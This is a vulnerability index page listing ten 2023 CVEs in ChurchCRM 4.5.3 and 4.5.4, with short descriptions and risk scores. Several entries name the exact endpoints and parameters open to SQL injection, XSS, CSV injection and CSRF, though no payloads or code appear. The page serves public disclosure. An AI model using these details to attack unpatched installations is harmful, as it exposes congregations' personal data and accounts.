Vulnerabilities > Churchcrm
DATE | CVE | VULNERABILITY TITLE | RISK |
---|---|---|---|
2023-05-04 | CVE-2023-29842 | SQL Injection vulnerability in Churchcrm 4.5.4 ChurchCRM 4.5.4 endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter. | 8.8 |
2023-04-25 | CVE-2023-25346 | Cross-site Scripting vulnerability in Churchcrm 4.5.3 A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found. | 6.1 |
2023-04-25 | CVE-2023-25347 | Cross-site Scripting vulnerability in Churchcrm 4.5.3 A stored cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3, allows remote attackers to inject arbitrary web script or HTML via input fields. | 5.4 |
2023-04-25 | CVE-2023-25348 | Improper Neutralization of Formula Elements in a CSV File vulnerability in Churchcrm 4.5.3 ChurchCRM 4.5.3 was discovered to contain a CSV injection vulnerability via the Last Name and First Name input fields when creating a new person. | 7.8 |
2023-04-25 | CVE-2023-26839 | Cross-Site Request Forgery (CSRF) vulnerability in Churchcrm 4.5.3 A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to edit information for existing people on the site. | 4.3 |
2023-04-25 | CVE-2023-26840 | Cross-Site Request Forgery (CSRF) vulnerability in Churchcrm 4.5.3 A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to set a person to a user and set that user to be an Administrator. | 5.3 |
2023-04-25 | CVE-2023-26841 | Cross-Site Request Forgery (CSRF) vulnerability in Churchcrm 4.5.3 A cross-site request forgery (CSRF) vulnerability in ChurchCRM v4.5.3 allows attackers to change any user's password except for the user that is currently logged in. | 6.5 |
2023-04-25 | CVE-2023-26843 | Cross-site Scripting vulnerability in Churchcrm 4.5.3 A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php. | 5.4 |
2023-04-04 | CVE-2023-26855 | Use of Insufficiently Random Values vulnerability in Churchcrm 4.5.3 The hashing algorithm of ChurchCRM v4.5.3 utilizes a non-random salt value which allows attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords. | 7.5 |
2023-03-16 | CVE-2023-27059 | Cross-site Scripting vulnerability in Churchcrm 4.5.3 A cross-site scripting (XSS) vulnerability in the Edit Group function of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Group Name text field. | 5.4 |